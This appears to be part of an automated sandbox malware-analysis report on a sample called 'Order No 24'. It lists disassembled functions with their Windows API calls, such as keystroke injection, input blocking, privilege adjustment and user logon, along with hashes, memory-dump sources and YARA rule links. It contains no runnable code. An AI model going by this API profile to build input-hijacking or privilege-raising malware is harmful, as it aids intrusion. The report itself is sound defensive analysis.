                                                                                                                                  • Opcode Fuzzy Hash: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                                                                                                                  • Instruction Fuzzy Hash: 2FF0827550022DABDB10ABE4DC49FEA776DFF09351F004169F919D6181D7309A41CBA5
                                                                                                                                  Function 009C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009C4153
                                                                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 009C4166
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                  • Opcode ID: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                                                                                                                  • Instruction ID: bd5d59ba95451e2493fe37810423b8edbf84839f841a73908dbdb7ee14500821
                                                                                                                                  • Opcode Fuzzy Hash: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                                                                                                                  • Instruction Fuzzy Hash: E1F0677190424DAFDB058FA0CC05BBE7FB4EF10309F04840AF966AA192D77996129FA0
                                                                                                                                  Function 009BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                                                                                                                  • CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  • Opcode ID: 2430332a03fa0107125b616dba5f1c7112a655702cbdf09c874661722737df90
                                                                                                                                  • Instruction ID: 4dc31a2574cec4d192baa412e2df7f9ae476ff52240420d5d58602a394dd0f56
                                                                                                                                  • Opcode Fuzzy Hash: 2430332a03fa0107125b616dba5f1c7112a655702cbdf09c874661722737df90
                                                                                                                                  • Instruction Fuzzy Hash: EEE0E672000510AFEB252F94EC05D77BBEDEF44320711C529F45AC1470DB625D91DB51
                                                                                                                                  Function 009A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,009A6DB3,-0000031A,?,?,00000001), ref: 009A81B1
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A81BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                                                                                                                  • Instruction ID: 5cb72126c17b0e93250f1ef2b8c15e89fb4d443515664cbb36fe9960e2bbfedc
                                                                                                                                  • Opcode Fuzzy Hash: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                                                                                                                  • Instruction Fuzzy Hash: 5BB0923204460CABDB006BE1EC09B587F68EB08752F004010F60D480618B7254138A93
                                                                                                                                  Function 009877B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 1d14c90f1b39ee1955128f06a3eb5d4e172900055fca3be4c0e17e65ec81971f
                                                                                                                                  • Instruction ID: c03ed77c2da85279961b2556371346763924ddcf63df4b67dbeefc967e4d2977
                                                                                                                                  • Opcode Fuzzy Hash: 1d14c90f1b39ee1955128f06a3eb5d4e172900055fca3be4c0e17e65ec81971f
                                                                                                                                  • Instruction Fuzzy Hash: BEA24B71E04219CFDB24DF98C8807ADBBB1FF48314F2585A9E859AB391D7349E81DB90
                                                                                                                                  Function 009AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5cfccdf394c6449f5d34b98fb1a27e024917d3979da9813098912f2c218df759
                                                                                                                                  • Instruction ID: 4c5b8a1320efacd07c8e7896eebf3436335ea30bcb1d75fca821056b717ab9d9
                                                                                                                                  • Opcode Fuzzy Hash: 5cfccdf394c6449f5d34b98fb1a27e024917d3979da9813098912f2c218df759
                                                                                                                                  • Instruction Fuzzy Hash: F3320521D2AF414DD7239634D822336A29DAFB73D4F15D737F81AB5DAAEB29C4834240
                                                                                                                                  Function 009896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 674341424-0
                                                                                                                                  • Opcode ID: 8a706e2cbbd0597b528817a28a69ba2671aeeed50d55554e4cd7dcb22c436a4d
                                                                                                                                  • Instruction ID: 61403443de726f1121b0f50641a67aab1edee9740cebd8a6cdbcccdd0fcbdfc7
                                                                                                                                  • Opcode Fuzzy Hash: 8a706e2cbbd0597b528817a28a69ba2671aeeed50d55554e4cd7dcb22c436a4d
                                                                                                                                  • Instruction Fuzzy Hash: BA2289B16083059FD724EF28C891B6FB7E4AF84314F14891DF99A9B391DB71E944CB82
                                                                                                                                  Function 009B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 32a849421499b8febdb7c5c2dbc2fc223d0de33c1dfde25308bf849b1a6dd409
                                                                                                                                  • Instruction ID: c3b23f8b786de3f2ba0c9f818b945886c3b882210f45d492f01db4ce4d504a9e
                                                                                                                                  • Opcode Fuzzy Hash: 32a849421499b8febdb7c5c2dbc2fc223d0de33c1dfde25308bf849b1a6dd409
                                                                                                                                  • Instruction Fuzzy Hash: 45B1DF20D2AF518DD623D6B98831336B65CAFFB2D5B91D71BFC1A74D22EB2185834180
                                                                                                                                  Function 009CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __time64.LIBCMT ref: 009CB6DF
                                                                                                                                    • Part of subcall function 009A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBDC3,00000000,?,?,?,?,009CBF70,00000000,?), ref: 009A3453
                                                                                                                                    • Part of subcall function 009A344A: __aulldiv.LIBCMT ref: 009A3473
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2893107130-0
                                                                                                                                  • Opcode ID: f9ab1b3592481f0602fe7af10361e5e79920059600bc7c9f86ce5b326c734c1d
                                                                                                                                  • Instruction ID: 7d0b19a3dc82a7cc84670bc9023bcae9ce88c030dfcfc45bcb3c9b8a2d656ea7
                                                                                                                                  • Opcode Fuzzy Hash: f9ab1b3592481f0602fe7af10361e5e79920059600bc7c9f86ce5b326c734c1d
                                                                                                                                  • Instruction Fuzzy Hash: E52172766345108BCB29CF68C881B52B7E5EB95320B248E6DE4E5CF2D0CB74BA05DB54
                                                                                                                                  Function 009D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • BlockInput.USER32(00000001), ref: 009D6ACA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockInput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                  • Opcode ID: 2257c152eae2845f93ea725954e0612ae5ab3078c818e799f76497224c6b8e75
                                                                                                                                  • Instruction ID: 9db1796cd86ba571191abcd37607f600537764b197e506cd2531c9dc5b7a8667
                                                                                                                                  • Opcode Fuzzy Hash: 2257c152eae2845f93ea725954e0612ae5ab3078c818e799f76497224c6b8e75
                                                                                                                                  • Instruction Fuzzy Hash: C4E048362502046FC700EF99D404E56B7ECAFB4751F05C457F945D7391DAB0F8048B90
                                                                                                                                  Function 009C74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009C74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: mouse_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                  • Opcode ID: 95e4805b7d0254750117be2a15dca9aeeef1a84e4dbfaeae65173f2fdfab489e
                                                                                                                                  • Instruction ID: 6005b7f5c60852551ad185110983045796ef67aa06883c9f69bc5911d23fab06
                                                                                                                                  • Opcode Fuzzy Hash: 95e4805b7d0254750117be2a15dca9aeeef1a84e4dbfaeae65173f2fdfab489e
                                                                                                                                  • Instruction Fuzzy Hash: A1D017A192C20528F82C07A4CC0FF76890AB3107C1F80858DB482990E1A88468069823
                                                                                                                                  Function 009BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009BAD3E), ref: 009BB124
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LogonUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                  • Opcode ID: f7e72a0fc15d864526962e1907c5a83fa7fcc36c092c1b09c9bedc33581951e4
                                                                                                                                  • Instruction ID: f1fe9011a56896d56209bcef3387843713c2186392948d9ead223b52662b385a
                                                                                                                                  • Opcode Fuzzy Hash: f7e72a0fc15d864526962e1907c5a83fa7fcc36c092c1b09c9bedc33581951e4
                                                                                                                                  • Instruction Fuzzy Hash: 33D09E331A464EAEDF029FA4DC06EAE3F6AEB04701F448511FA16D50A1C675D532AB50
                                                                                                                                  Function 009FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NameUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                  • Opcode ID: 7a35ed7291eb2ac50605dbea0652a3cf9d78a0b13b551ccfa7ce63c64f776c51
                                                                                                                                  • Instruction ID: e2ee994b4aef067293afc2897d602b1df1f9dd2b5f62e71653dd7b27437dd6a8
                                                                                                                                  • Opcode Fuzzy Hash: 7a35ed7291eb2ac50605dbea0652a3cf9d78a0b13b551ccfa7ce63c64f776c51
                                                                                                                                  • Instruction Fuzzy Hash: BFC04CF240014DDFD751CFC0C9449EEB7BCAB04301F104095924AF1110D7749B469B72
                                                                                                                                  Function 009A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009A818F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: 71173f5fcf789c2deba532b3cb794c620b14eeb2f53fb6c3ee2afec931f404db
                                                                                                                                  • Instruction ID: 27673cbd04f3bcc20b1a1322de0204d63f605961784268da36c5cbfdcfbf82d0
                                                                                                                                  • Opcode Fuzzy Hash: 71173f5fcf789c2deba532b3cb794c620b14eeb2f53fb6c3ee2afec931f404db
                                                                                                                                  • Instruction Fuzzy Hash: 41A0113200020CABCF002BC2EC088883F2CEA002A0B000020F80C080208B22A8228A82
                                                                                                                                  Function 0098E3B0 Relevance: .5, Instructions: 540COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e9146a6690d37c5e32699dbaaaf90c2f8b3d13e32a6c1668523a3c582c0fa29
                                                                                                                                  • Instruction ID: 882cf7011ad7b8a4671537b8e81dd6043c1bd49392d8e616374e557339412fd4
                                                                                                                                  • Opcode Fuzzy Hash: 1e9146a6690d37c5e32699dbaaaf90c2f8b3d13e32a6c1668523a3c582c0fa29
                                                                                                                                  • Instruction Fuzzy Hash: 8122BC70E0420A9FDB24EF58C4A0BBEF7B4FF58314F148469E95A9B351E335A981CB91
                                                                                                                                  Function 009893F0 Relevance: .5, Instructions: 531COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e74b3624c48d4ea6c354d6d5decb98de815613553c52294da1b3b5a2bedc672e
                                                                                                                                  • Instruction ID: 6d16b188ba15f32685f58a68735e1a701a94ee5df138cfabb8b102d8d828b5ac
                                                                                                                                  • Opcode Fuzzy Hash: e74b3624c48d4ea6c354d6d5decb98de815613553c52294da1b3b5a2bedc672e
                                                                                                                                  • Instruction Fuzzy Hash: 92126B70A00609EFDF04EFA9D985ABEB7F9FF48300F148569E806E7250EB35A911CB54
                                                                                                                                  Function 0098AF50 Relevance: .5, Instructions: 514COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3728558374-0
                                                                                                                                  • Opcode ID: 54169373852ac65ef1b08989385c3d61e21d11619f00208412b5182fddb272e7
                                                                                                                                  • Instruction ID: a68f18f583bad7df243bb9be1c525ac8bc481f2367d152fb94130808c239cfa3
                                                                                                                                  • Opcode Fuzzy Hash: 54169373852ac65ef1b08989385c3d61e21d11619f00208412b5182fddb272e7
                                                                                                                                  • Instruction Fuzzy Hash: 57029F70A00209DBDF04EF68D991BAEBBB5FF84300F148469E906DB395EB35DA15CB91
                                                                                                                                  Function 009A02A4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
